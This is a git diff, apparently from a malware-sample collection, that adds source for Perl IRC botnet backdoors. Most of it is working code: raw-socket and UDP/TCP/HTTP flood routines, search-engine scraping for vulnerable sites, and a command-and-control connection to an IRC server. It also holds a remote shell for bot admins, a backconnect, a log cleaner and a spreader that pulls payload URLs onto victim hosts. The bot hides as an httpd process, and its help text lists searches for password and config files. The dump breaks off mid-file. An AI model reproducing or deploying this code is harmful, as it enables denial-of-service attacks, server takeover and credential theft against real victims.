+send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+
+for (my $pc = 3;
+$pc <= 255;$pc++) {
+next if $pc == 6;
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
+}
+}
+last if $cur_time >= $ftime;
+}
+return($cur_time, %pacotes);
+}
+
+sub ctcp {
+return unless $#_ == 1;
+sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+
+sub msg {
+return unless $#_ == 1;
+sendraw("PRIVMSG $_[0] :$_[1]");
+}
+
+sub notice {
+return unless $#_ == 1;
+sendraw("NOTICE $_[0] :$_[1]");
+}
+
+sub op {
+return unless $#_ == 1;
+sendraw("MODE $_[0] +o $_[1]");
+}
+
+sub deop {
+return unless $#_ == 1;
+sendraw("MODE $_[0] -o $_[1]");
+}
+
+sub j {
+&join(@_);
+}
+
+sub join {
+return unless $#_ == 0;
+sendraw("JOIN $_[0]");
+
+}
+sub p { part(@_);
+}
+
+sub part {
+sendraw("PART $_[0]");
+}
+
+sub nick {
+return unless $#_ == 0;
+sendraw("NICK $_[0]");
+}
+
+sub quit {
+sendraw("QUIT :$_[0]");
+}
+
+#####
+# SUBS GOOGLE
+#####
+sub googlet {
+my @dominios = ("ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk");
+my @country = ("AE","AR","AT","AU","BE","BR","CA","CH","CL","DE","DK");
+my @lang = ("en","es","de","nl","pt-BR","it","de","fo","sv","fr","el");
+my @lst;
+my $key=key($_[0]);
+my $c=0;
+foreach my $i (@dominios){
+my @lista = google($i,$key,$lang[$c],$country[$c]);
+push(@lst,@lista);
+$c++;
+}
+return @lst;
+}
+
+sub google(){
+my @lst;
+my $i=$_[0];
+my $key=$_[1];
+my $lang= $_[2];
+my $country =$_[3];
+for($b=0;$b<=5000;$b+=100){
+my $Go=("www.google.".$i."/search?hl=".$lang."&q=".key($key)."&num=100&start=".$b."&meta=cr%3Dcountry".$country);
+my $Res=query($Go);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /google/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS AllTheWeb
+#####
+
+sub allthewebt {
+my @lang = ("en","es","de","nl","pt-BR","it","de","fo");
+my @lst;
+my $key=key($_[0]);
+my $c=0;
+foreach my $lang (@lang){
+my @lista = alltheweb($key,$lang[$c]);
+push(@lst,@lista);
+$c++;
+}
+return @lst;
+}
+
+
+sub alltheweb(){
+my @lista;
+my $key = $_[0];
+my $lang= $_[1];
+for($b=0;$b<=500;$b+=100){
+my $alltheweb=("http://www.alltheweb.com/search?cat=web&_sb_lang=".$lang."&hits=100&q=".key($key)."&o=".$b);
+my $Res=query($alltheweb);
+while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub standard()
+{
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=100)
+{
+my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
+my $Res=query($all);
+while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+#####
+# SUBS Lycos
+#####
+sub lycos(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $ly=("http://search.lycos.com/?query=".key($key)."&page=$av".$b);
+my $Res=query($ly);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS Yahoo
+#####
+sub yahoo(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=100){
+my $Ya=("http://br.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub yahooa(){
+my @lst;
+my $key = $_[0];
+for($b=210;$b<=1000;$b+=210){
+my $Ya=("http://be.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub yahoob(){
+my @lst;
+my $key = $_[0];
+for($b=410;$b<=1000;$b+=210){
+my $Ya=("http://us.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub yahooc(){
+my @lst;
+my $key = $_[0];
+for($b=610;$b<=1000;$b+=210){
+my $Ya=("http://it.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub yahood(){
+my @lst;
+my $key = $_[0];
+for($b=810;$b<=1000;$b+=210){
+my $Ya=("http://de.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+#####
+# SUBS MSN
+#####
+sub msn(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
+my $Res=query($MsN);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if($1 !~ /msn|live/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS SEARCH
+#####
+sub search(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $ser=("http://www.search.com/search?q=".key($key)."".$b);
+my $Res=query($ser);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS FireBall
+#####
+sub fireball(){
+my $key=$_[0];
+my $inizio=1;
+my $pagine=200;
+my @lst;
+my $av=0;
+while($inizio <= $pagine){
+my $fireball="http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=fb_loc&idx=all&enc=utf-8";
+my $Res=query($fireball);
+while ($Res=~ m/<a href=\"?http:\/\/(.+?)\//g ){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k="$1/";
+my @grep=links($k);
+push(@lst,@grep);
+}}
+$av=$av+10;
+$inizio++;
+}
+return @lst;
+}
+
+#####
+# SUBS UOL
+#####
+sub uol(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i);
+my $Res=query($UoL);
+while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){
+my $k=$1;
+if($k!~/busca|uol|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# Altavista
+#####
+sub altavista(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
+my $Res=query($AlT);
+while($Res=~m/<span class=ngrn>(.+?)\//g){
+if($1 !~ /altavista/){
+my $k=$1;
+$k=~s/<//g;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+sub altavistade(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $AlT=("http://de.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
+my $Res=query($AlT);
+while($Res=~m/<span class=ngrn>(.+?)\//g){
+if($1 !~ /altavista/){
+my $k=$1;
+$k=~s/<//g;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+sub altavistaus(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $AlT=("http://us.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
+my $Res=query($AlT);
+while($Res=~m/<span class=ngrn>(.+?)\//g){
+if($1 !~ /altavista/){
+my $k=$1;
+$k=~s/<//g;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# HotBot
+#####
+sub hotbot(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $hot=("http://search.hotbot.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=hb_loc&enc=utf-8".$b);
+my $Res=query($hot);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+
+#####
+# Mamma
+#####
+sub mamma(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $mam=("http://www.mamma.com/Mamma?utfout=$av&qtype=0&query=".key($key)."".$b);
+my $Res=query($mam);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# MozBot
+#####
+sub mozbot()
+{
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=100; $i+=1){
+my $mozbot=("http://www.mozbot.fr/search?q=".key($key)."&st=int&page=".$i);
+my $Res=query($mozbot);
+while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub links()
+{
+my @l;
+my $link=$_[0];
+my $host=$_[0];
+my $hdir=$_[0];
+$hdir=~s/(.*)\/[^\/]*$/\1/;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$host.="/";
+$link.="/";
+$hdir.="/";
+$host=~s/\/\//\//g;
+$hdir=~s/\/\//\//g;
+$link=~s/\/\//\//g;
+push(@l,$link,$host,$hdir);
+return @l;
+}
+
+sub geths(){
+my $host=$_[0];
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+return $host;
+}
+
+sub key(){
+my $chiave=$_[0];
+$chiave =~ s/ /\+/g;
+$chiave =~ s/:/\%3A/g;
+$chiave =~ s/\//\%2F/g;
+$chiave =~ s/&/\%26/g;
+$chiave =~ s/\"/\%22/g;
+$chiave =~ s/,/\%2C/g;
+$chiave =~ s/\\/\%5C/g;
+return $chiave;
+}
+
+sub query($){
+my $url=$_[0];
+$url=~s/http:\/\///;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host=~s/href=\"?http:\/\///;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query=~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+close($sock);
+};
+return $page;
+}
+
+sub unici{
+my @unici = ();
+my %visti = ();
+foreach my $elemento ( @_ )
+{
+next if $visti{ $elemento }++;
+push @unici, $elemento;
+}   
+return @unici;
+}
+
+sub http_query($){
+my ($url) = @_;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host =~ s/href=\"?http:\/\///;
+$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query =~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+local $SIG{ALRM} = sub { die "1";};
+alarm 10;
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+alarm 0;
+close($sock);
+};
+return $page;
+}
+}
+
+
+###############################################
+#					      #
+#	pemula XtReme scanNER		      #
+#					      #
+###############################################
diff --git a/Perl/Backdoor.Perl.IRCBot.z b/Perl/Backdoor.Perl.IRCBot.z
new file mode 100644
index 00000000..11823930
--- /dev/null
+++ b/Perl/Backdoor.Perl.IRCBot.z
@@ -0,0 +1,2116 @@
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+#################################
+
+######################
+use HTTP::Request;
+use LWP::UserAgent;
+######################
+my $processo = '/usr/sbin/httpd';
+######################
+#####################################################################
+#/!\                          .:CONFIGURATION:.                  /!\#
+#####################################################################
+############################################
+my $linas_max='8';
+#-----------------                         #
+# Maximum Lines for Anti Flood             #
+#############################################
+my $sleep='5';
+#-----------------                         #                                      
+#Sleep Time                                #
+############################################
+my $cmd="http://freewebs.com/alb_rinia/r57.txt?";
+#-----------------                         #
+#CMD that is printed in the channel        #
+############################################
+my $id="http://www.gg2003.de/phpBB2//language/kar/id.txt?";
+#-----------------                         #
+#ID = Response CMD                         #
+############################################
+my $spread="http://www.gg2003.de/phpBB2//language/kar/spread.txt?";
+#-----------------                         #
+#Spreader                                  #
+############################################
+my @adms=("MrNETi");
+#my @hostauth=("mrneti.com");
+#-----------------                         #
+#Admins of the Bot set your nickname here  #
+############################################
+my @canais=("#asc");
+#-----------------                         #
+#Put your channel here                     #
+############################################
+my $nick="LIN[TC|00|MR]".int(rand(1000))."";
+#-----------------                         #
+#Nickname of bot                           #
+############################################
+my $ircname ='Alb';
+chop (my $realname = 'Albania Security Clan');
+#-----------------                         #
+#IRC name and Realname                     #
+############################################
+$servidor='mrcold.no-ip.biz' unless $servidor;
+my $porta='6667';
+#-----------------                         #
+#IRCServer and port                        #
+############################################
+#####################################################################
+#/!\                          .:CONFIGURATION:.                  /!\#
+#####################################################################
+######################
+#End of Configuration# 
+#                    #
+######################
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir("/");
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+
+#Connect
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Masalah fork: $!" unless defined($pid);
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+    } else {
+    print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+  my $meunick = $_[0];
+  my $servidor_con = $_[1];
+  my $porta_con = $_[2];
+  my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con",
+  PeerPort=>$porta_con) or return(1);
+  if (defined($IRC_socket)) {
+    $IRC_cur_socket = $IRC_socket;
+    $IRC_socket->autoflush(1);
+    $sel_cliente->add($IRC_socket);
+    $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+    $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+    $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+    nick("$meunick");
+    sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+    sleep 1;
+  }
+}
+
+my $line_temp;
+while( 1 ) {
+  while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+  delete($irc_servers{''}) if (defined($irc_servers{''}));
+  my @ready = $sel_cliente->can_read(0);
+  next unless(@ready);
+  foreach $fh (@ready) {
+    $IRC_cur_socket = $fh;
+    $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+    $nread = sysread($fh, $msg, 4096);
+    if ($nread == 0) {
+      $sel_cliente->remove($fh);
+      $fh->close;
+      delete($irc_servers{$fh});
+    }
+    @lines = split (/\n/, $msg);
+    for(my $c=0; $c<= $#lines; $c++) {
+
+      $line = $lines[$c];
+      $line=$line_temp.$line if ($line_temp);
+      $line_temp='';
+      $line =~ s/\r$//;
+      unless ($c == $#lines) {
+        parse("$line");
+        } else {
+        if ($#lines == 0) {
+          parse("$line");
+          } elsif ($lines[$c] =~ /\r$/) {
+          parse("$line");
+          } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+          parse("$line"); 
+          	   } else {
+          	               $line_temp = $line;
+        }
+      }
+    }
+  }
+}
+
+sub parse {
+  my $servarg = shift;
+  if ($servarg =~ /^PING \:(.*)/) {
+    sendraw("PONG :$1");
+    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+    my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
+    if ($args =~ /^\001VERSION\001$/) {
+      	 notice("$pn", "\001VERSION mIRC v6.17 cHApoenk\001");
+    }
+    if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) {
+    if ($onde eq "$meunick"){
+    shell("$pn", "$args");
+  }
+  
+#End of Connect
+
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% 
+######################
+#      PREFIX        #
+#                    #
+######################
+# You can change the prefix if you want but the commands will be different 
+# The standard prefix is !bgr if you change it into !bitch for example 
+# every command will be like !bitch @udpflood, !bitch @googlescan.
+# So its recommended not to change this ;)
+######################
+  
+  if ($args =~ /^(\Q$meunick\E|\!asc)\s+(.*)/ ) {
+    my $natrix = $1;
+    my $arg = $2;
+    if ($arg =~ /^\!(.*)/) {
+      ircase("$pn","$onde","$1") unless ($natrix eq "!asc" and $arg =~ /^\!nick/);
+      } elsif ($arg =~ /^\@(.*)/) {
+      $ondep = $onde;
+      $ondep = $pn if $onde eq $meunick;
+      bfunc("$ondep","$1");
+      } else {
+      shell("$onde", "$arg");
+    }
+  }
+}
+}
+######################
+#   End of PREFIX    #
+#                    #
+######################
+
+elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+if (lc($1) eq lc($meunick)) {
+  $meunick=$4;
+  $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+}
+} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+nick("$meunick".int rand(999999));
+} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+$meunick = $2;
+$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+foreach my $canal (@canais) {
+  sendraw("JOIN $canal ddosit");
+}
+}
+}
+
+sub bfunc {
+my $printl = $_[0];
+my $funcarg = $_[1];
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+  exit;
+} else {
+
+######################
+#       Help         # 
+#                    #
+######################
+
+if ($funcarg =~ /^help/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) Select the function you want help for");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@ddos");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@scanscan");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@backconnect");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@shell");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@portscanner");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) Or if you want too know all the commands type:");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@commands");
+
+}
+
+if ($funcarg =~ /^ddos/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) There are 3 DDossers in this bot");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) UDPFlood, HTTPFlood and TCPFlood");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@udpflood <ip> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@tcpflood <ip> <port> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@httpflood <site> <time>");
+
+}
+
+if ($funcarg =~ /^scan/) {
+	#sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) This bot also contains a scan scanner.");
+	
+}
+
+if ($funcarg =~ /^backconnect/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) You use backconnect like this :");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@back <ip><port>");
+}
+
+if ($funcarg =~ /^shell/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) This bot has a integrated shell");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) You can use it in private but also public in the channel");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) In public channel just use : 7!bgr cd tmp12 for example");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) For help with the linux commands type :!bgr 7@linuxhelp");
+}
+
+if ($funcarg =~ /^port/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) There is a normal portscan and a Nmap:");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@portscan <ip>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@nmap <ip> <beginport> <endport>");
+}
+
+if ($funcarg =~ /^commands/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) You can use the following commands :");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@portscan <ip>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@nmap <ip> <beginport> <endport>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@back <ip><port>");	
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc cd tmp 12 for example");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@udpflood <ip> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@tcpflood <ip> <port> <packet size> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@httpflood <site> <time>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@linuxhelp");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@spread <scan>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@scan <vuln> <dork>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@system");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@logcleaner");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@sendmail <subject> <sender> <recipient> <message>");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@milw0rm");	
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@join #channel");	
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@part #channel");
+}
+
+if ($funcarg =~ /^linuxhelp/) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Dir where you are : pwd");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Start a Perl file : perl file.pl");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Go back from dir : cd ..");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Force to Remove a file/dir : rm -rf file/dir;ls -la");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Show all files/dir with permissions : ls -lia");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Find config.inc.php files : find / -type f -name config.inc.php");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Find all writable folders and files : find / -perm -2 -ls");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Find all .htpasswd files : find / -type f -name .htpasswd");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Find all service.pwd files : find / -type f -name service.pwd");
+}
+
+######################
+#   End of  Help     # 
+#                    #
+######################
+if ($funcarg =~ /^spread\s+(.*)/) {
+$vuln = $1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Spread Mode4+) Spreading bot on :14 $vuln");
+my $shellurl="http://".$vuln.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$shellurl);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Spread Mode4+) Bot is Spreaded on :14 $vuln"); 
+}
+######################
+#     Commands       # 
+#                    #
+######################
+
+if ($funcarg =~ /^system/) {
+$uname=`uname -a`;$uptime=`uptime`;$ownd=`pwd`;$distro=`cat /etc/issue`;$id=`id`;$un=`uname -sro`;
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Info BOT : Server : 14Cannot View :14 1337");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Uname -a     : 7 $uname");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Uptime       : 7 $uptime");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Own Prosses  : 7 $processo");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) ID           : 7 $id");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Own Dir      : 7 $ownd");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) OS           : 7 $distro");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Owner        : 7 cHApoenk");
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Channel      : 7 #354");
+}
+
+if ($funcarg =~ /^bug/) {
+	my @ltt=();
+	my @bug=();
+	my $x;
+	my $page="";
+	my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
+	print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+	my @r = <$socke>;
+	$page="@r";
+	close($socke);
+	while ($page =~  m/<title>(.*)</g){
+	$x = $1;
+	if ($x =~ /\&lt\;/) {
+	$x =~ s/\&lt\;/</g;
+	}
+	if ($x !~ /milw0rm/) {
+	push (@bug,$x);
+	}}
+	while ($page =~  m/<link.*expl.*([0-9]...)</g) {
+	if ($1 !~ m/milw0rm.com|exploits|en/){
+	push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
+	}}
+		sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Milw0rm Hack4+) Latest exploits :");
